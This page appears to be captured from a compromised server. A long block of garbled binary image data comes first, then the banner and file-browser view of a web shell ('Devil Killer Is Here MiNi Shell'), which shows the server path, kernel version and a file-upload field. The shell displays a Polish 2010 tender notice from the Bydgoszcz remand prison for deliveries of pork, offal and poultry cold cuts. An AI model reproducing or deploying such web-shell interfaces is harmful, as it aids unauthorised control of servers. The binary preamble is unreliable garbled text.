JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100104/1642-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Dostawy wędlin</b><br>
<b>Numer ogłoszenia: 1642 - 2010; data zamieszczenia: 04.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5855252, 5855303, faks 052 5855300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - wędliny wieprzowe
 1. Baleron świętokrzyski (CPV 15131130-5)  w ilości około 500 kg

2. Boczek wędzony (CPV 15131200-7)  w ilości około 500 kg

3. Kiełbasa piwna (CPV15131130-5) w ilości około 1 000 kg 

4. Kiełbasa biała parzona (CPV15131130-5) w ilości około 100 kg 

5. Kiełbasa codzienna (CPV 15131130-5)  w ilości około 3 000 kg

6. Kiełbasa jarmarczna (CPV 15131130-5) w ilości około 3 000 kg

7. Kiełbasa parówkowa (CPV 15131130-5) w ilości około 2 500 kg

8. Kiełbasa serdelowa (CPV 15131130-5) w ilości około 1 000 kg

9. Kiełbasa zwyczajna (CPV 15131130-5)  w ilości około 4 000 kg

10. Kiełbasa żywiecka (CPV15131130-5)w ilości około 2 000 kg

11. Kiełbasa krakowska parzona (CPV15131130-5) w ilości około 2 000 kg

12. Metka (CPV 15131130-5) w ilości około 2 000 kg

13. Mortadela (CPV 15131130-5)  w ilości około 3 000 kg

14. Parówki cienkie (CPV 15131130-5)  w ilości około 3 000 kg

15. Pieczeń domowa (CPV 15131100-6)  w ilości około 2 000 kg

16. Szynka mielona (CPV 15131410-2)  w ilości około 2 000 kg

17. Szynka tyrolska (CPV 15131130-5) w ilości około 2 000 kg

18. Wędzonka prasowana (CPV 15131130-5)  w ilości około 1 500 kg


Część II - wędliny podrobowe
 1. Głowizna (CPV 15114000-0)  w ilości około 500 kg

2. Kaszanka (CPV 15131134-3)  w ilości około 1 500 kg

3. Krupniok śląski (CPV 15131134-3)  w ilości około 1 500 kg

4. Pasztet firmowy (CPV 15131300-8)  w ilości około 1 000 kg

5. Pasztetowa (CPV 15131131-2)  w ilości około 1 500 kg

6. Salceson czarny (CPV  15131134-3)  w ilości około 1 800 kg       

7. Salceson włoski (CPV 15131134-7)  w ilości około 1 800 kg

Część III - wędliny drobiowe
1.Mielonka drobiowa (15131135-0)  w ilości około 5 000 kg

2. Mielonka kanapkowa drobiowa (CPV 15131135-0)  w ilości około 2 000 kg

3. Polędwica drobiowa (CPV 15131135-0) PN-A-86526   w ilości około 1 000 kg	

4. Serdelki z indyka (CPV 15131135-0)  w ilości około 4 500 kg

5. Szynka drobiowa (CPV 15131135-0)  w ilości około 2 000 kg

6. Szynka mozaikowa (CPV 15131135-0) PN-A-86526 w ilości około 2 000 kg

7. Szynka z piersi indyka (CPV 15131135-0)  w ilości około 300 kg

8. Parówki drobiowe (CPV 15131135-0) w ilości około 3 000 kg 

9. Szynkowa z  indyka(CPV 15131135-0)  w ilości około 3 000 kg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.12.00-7, 15.13.11.00-6, 15.13.14.10-2, 15.11.40.00-0, 15.13.11.34-3, 15.13.13.00-8, 15.13.11.31-2, 15.13.11.34-7, 15.13.11.35-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy spełnią warunki dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)  posiadania niezbędnej wiedzy i doświadczenia;  
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia;
4) sytuacji ekonomicznej i finansowej;
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
Ustanawiają wtedy pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wymagania dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie, zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia  nie spełnia, na podstawie oświadczeń i dokumentów wymienionych w rozdziale VI SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty jakie wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu. (dotyczy rozdziału V)
Aby oferta składana przez wykonawców była ważna pod względem formalnym powinna zawierać:
1)prawidłowo wypełniony formularz ofertowy  (załącznik nr 1)
2)oświadczenie o spełnianiu przez wykonawcę warunków udziału w postępowaniu, o których mowa w rozdziale V, (art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. z późn. zm. -Prawo zamówień publicznych) (załącznik nr 2)
3)oryginał lub kserokopia poświadczona przez oferenta za zgodność z oryginałem, aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4)Jeżeli wykonawca jest rolnikiem indywidualnym (definicja rolnika indywidualnego znajduje się w ustawie z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego, art. 6 (Dz. U. z 2003 r. Nr 64, poz. 592), który nie prowadzi pozarolniczej działalności gospodarczej, na podstawie przepisów o działalności gospodarczej lub innych przepisów szczegółowych (czyli zarejestrowanej np. w ewidencji działalności gospodarczej), to w miejsce dokumentu wymienionego w pkt 3 przedkłada aktualne oświadczenie, o którym mowa w art. 7 ust. 1 ustawy z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego- Dowodem potwierdzającym osobiste prowadzenie gospodarstwa rolnego jest oświadczenie prowadzącego to gospodarstwo, poświadczone przez wójta (burmistrza, prezydenta miasta) lub przez osobę upoważnioną. W/w oświadczenie ma być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz mają się w nim znajdować dane dotyczące osoby prowadzącej gospodarstwo rolne, tj.:
a) imię i nazwisko,
b) dokładny adres zamieszkania
c)powierzchnia gospodarstwa

5)umowy regulującej współpracę podmiotów występujących wspólnie
6)w przypadku składania ofert przez podmioty występujące wspólnie, do oferty należy załączyć dokumenty wymienione w pkt. 3 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt - 3
składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto likwidacji ani nie ogłoszono upadłości;
    (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienia;
    (wystawione nie wcześniej niż 6 miesiące przed upływem terminu składania ofert)
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt - 3
zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty muszą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.

Zaświadczenia i informacje, których żąda zamawiający muszą być aktualne.
Jeśli kopię dokumentu potwierdza Wykonawca, to kopia musi zawierać - oświadczenie za zgodność z oryginałem wraz z pieczątką imienną i podpisem lub pieczątką firmową i czytelnym podpisem, osoby lub osób uprawnionych do reprezentowania Wykonawcy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym i wymaganiami ustawowymi - na każdej stronie kopii..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2010 godzina 12:00, miejsce: Areszt Śledczy ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy wędlin wieprzowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - wędliny wieprzowe
 1. Baleron świętokrzyski (CPV 15131130-5)  w ilości około 500 kg

2. Boczek wędzony (CPV 15131200-7)  w ilości około 500 kg

3. Kiełbasa piwna (CPV15131130-5) w ilości około 1 000 kg 

4. Kiełbasa biała parzona (CPV15131130-5) w ilości około 100 kg 

5. Kiełbasa codzienna (CPV 15131130-5)  w ilości około 3 000 kg

6. Kiełbasa jarmarczna (CPV 15131130-5) w ilości około 3 000 kg

7. Kiełbasa parówkowa (CPV 15131130-5) w ilości około 2 500 kg

8. Kiełbasa serdelowa (CPV 15131130-5) w ilości około 1 000 kg

9. Kiełbasa zwyczajna (CPV 15131130-5)  w ilości około 4 000 kg

10. Kiełbasa żywiecka (CPV15131130-5)w ilości około 2 000 kg

11. Kiełbasa krakowska parzona (CPV15131130-5) w ilości około 2 000 kg

12. Metka (CPV 15131130-5) w ilości około 2 000 kg

13. Mortadela (CPV 15131130-5)  w ilości około 3 000 kg

14. Parówki cienkie (CPV 15131130-5)  w ilości około 3 000 kg

15. Pieczeń domowa (CPV 15131100-6)  w ilości około 2 000 kg

16. Szynka mielona (CPV 15131410-2)  w ilości około 2 000 kg

17. Szynka tyrolska (CPV 15131130-5) w ilości około 2 000 kg

18. Wędzonka prasowana (CPV 15131130-5)  w ilości około 1 500 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.00-7, 15.13.11.30-5, 15.13.11.00-6, 15.13.14.10-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy wędlin podrobowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - wędliny podrobowe
 1. Głowizna (CPV 15114000-0)  w ilości około 500 kg

2. Kaszanka (CPV 15131134-3)  w ilości około 1 500 kg

3. Krupniok śląski (CPV 15131134-3)  w ilości około 1 500 kg

4. Pasztet firmowy (CPV 15131300-8)  w ilości około 1 000 kg

5. Pasztetowa (CPV 15131131-2)  w ilości około 1 500 kg

6. Salceson czarny (CPV  15131134-3)  w ilości około 1 800 kg       

7. Salceson włoski (CPV 15131134-7)  w ilości około 1 800 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-0, 15.13.11.34-3, 15.13.13.00-8, 15.13.11.31-2, 15.13.11.34-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy wędlin drobiowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Mielonka drobiowa (15131135-0)  w ilości około 5 000 kg

2. Mielonka kanapkowa drobiowa (CPV 15131135-0)  w ilości około 2 000 kg

3. Polędwica drobiowa (CPV 15131135-0) PN-A-86526   w ilości około 1 000 kg	

4. Serdelki z indyka (CPV 15131135-0)  w ilości około 4 500 kg

5. Szynka drobiowa (CPV 15131135-0)  w ilości około 2 000 kg

6. Szynka mozaikowa (CPV 15131135-0) PN-A-86526 w ilości około 2 000 kg

7. Szynka z piersi indyka (CPV 15131135-0)  w ilości około 300 kg

8. Parówki drobiowe (CPV 15131135-0) w ilości około 3 000 kg 

9. Szynkowa z  indyka(CPV 15131135-0)  w ilości około 3 000 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com